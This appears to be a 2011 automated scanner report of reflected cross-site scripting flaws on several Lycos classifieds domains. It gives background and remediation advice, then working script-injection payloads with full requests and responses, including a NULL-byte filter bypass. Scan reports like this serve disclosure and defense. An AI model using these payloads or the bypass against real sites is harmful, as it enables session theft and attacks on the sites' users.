Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://classifieds.lycos.ca/ [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.ca
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70c28"><script>alert(1)</script>6e5ce3e150c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?70c28"><script>alert(1)</script>6e5ce3e150c=1 HTTP/1.1 Host: classifieds.lycos.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:56:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:56:19 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26066
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/?70c28"><script>alert(1)</script>6e5ce3e150c=1&mobile=1" rel="nofollow"> ...[SNIP]...
1.2. http://classifieds.lycos.co.nz/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.co.nz
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 692ef"><script>alert(1)</script>756250e2c36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?692ef"><script>alert(1)</script>756250e2c36=1 HTTP/1.1 Host: classifieds.lycos.co.nz Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:56:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:56:16 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23729
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/?692ef"><script>alert(1)</script>756250e2c36=1&mobile=1" rel="nofollow"> ...[SNIP]...
1.3. http://classifieds.lycos.co.uk/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.co.uk
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fd18"><script>alert(1)</script>d47af225d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?3fd18"><script>alert(1)</script>d47af225d2=1 HTTP/1.1 Host: classifieds.lycos.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:56:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:56:15 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26620
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/?3fd18"><script>alert(1)</script>d47af225d2=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of the mobile request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65c1c"><script>alert(1)</script>34090552b4d was submitted in the mobile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?mobile=165c1c"><script>alert(1)</script>34090552b4d HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:56:36 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:56:36 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25649
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/?mobile=165c1c"><script>alert(1)</script>34090552b4d&mobile=1" rel="nofollow"> ...[SNIP]...
1.5. http://classifieds.lycos.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ea91"><script>alert(1)</script>1d982f7e555 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?9ea91"><script>alert(1)</script>1d982f7e555=1 HTTP/1.1 Host: classifieds.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PENTA=173.193.214.243.1297090182456621; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; __utmc=207906063; __utmb=207906063.5.10.1297090205
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:50:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:50:51 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25500
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/?9ea91"><script>alert(1)</script>1d982f7e555=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d8a00"><script>alert(1)</script>c770fb4825e was submitted in the REST URL parameter 1. This input was echoed as d8a00"><script>alert(1)</script>c770fb4825e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /ajax%00d8a00"><script>alert(1)</script>c770fb4825e/submission.php HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:54:22 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:54:22 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/ajax%00d8a00"><script>alert(1)</script>c770fb4825e/submission.php?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0046449"><script>alert(1)</script>2135f17cc50 was submitted in the REST URL parameter 2. This input was echoed as 46449"><script>alert(1)</script>2135f17cc50 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /ajax/submission.php%0046449"><script>alert(1)</script>2135f17cc50 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:55:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:43 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/ajax/submission.php%0046449"><script>alert(1)</script>2135f17cc50?mobile=1" rel="nofollow"> ...[SNIP]...
1.8. http://classifieds.lycos.com/ajax/submission.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/ajax/submission.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0075d78"><script>alert(1)</script>3385c761fc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75d78"><script>alert(1)</script>3385c761fc4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /ajax/submission.php/%0075d78"><script>alert(1)</script>3385c761fc4 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:20:22 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:22 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/ajax/submission.php/%0075d78"><script>alert(1)</script>3385c761fc4?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 360d0"><script>alert(1)</script>c5396564657 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bootstrap.js360d0"><script>alert(1)</script>c5396564657 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:54:35 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:54:35 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/bootstrap.js360d0"><script>alert(1)</script>c5396564657?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75633"><script>alert(1)</script>ba65cf1512 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse75633"><script>alert(1)</script>ba65cf1512/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:53:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:28 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17670
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/browse75633"><script>alert(1)</script>ba65cf1512/?mobile=1" rel="nofollow"> ...[SNIP]...
1.11. http://classifieds.lycos.com/browse/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/browse/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8d82"><script>alert(1)</script>b3badc87833 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/?e8d82"><script>alert(1)</script>b3badc87833=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:20:22 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:22 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15024
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a href="/browse/?e8d82"><script>alert(1)</script>b3badc87833=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd2ff"><script>alert(1)</script>01dce6dd8cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /community-ridesharedd2ff"><script>alert(1)</script>01dce6dd8cf/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:53:32 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:32 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17712
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/community-ridesharedd2ff"><script>alert(1)</script>01dce6dd8cf/?mobile=1" rel="nofollow"> ...[SNIP]...
1.13. http://classifieds.lycos.com/community-rideshare/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/community-rideshare/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6eae"><script>alert(1)</script>49cb3ea26e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /community-rideshare/?a6eae"><script>alert(1)</script>49cb3ea26e6=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:53:25 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:25 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 10428
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/community-rideshare/?a6eae"><script>alert(1)</script>49cb3ea26e6=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f906"><script>alert(1)</script>0ecae4b5915 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /community4f906"><script>alert(1)</script>0ecae4b5915/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:20:21 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:21 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17682
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/community4f906"><script>alert(1)</script>0ecae4b5915/?mobile=1" rel="nofollow"> ...[SNIP]...
1.15. http://classifieds.lycos.com/community/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/community/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9635"><script>alert(1)</script>84af8c3ea5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /community/?c9635"><script>alert(1)</script>84af8c3ea5c=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:20:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:03 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47605
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/community/?c9635"><script>alert(1)</script>84af8c3ea5c=1&mobile=1" rel="nofollow"> ...[SNIP]...
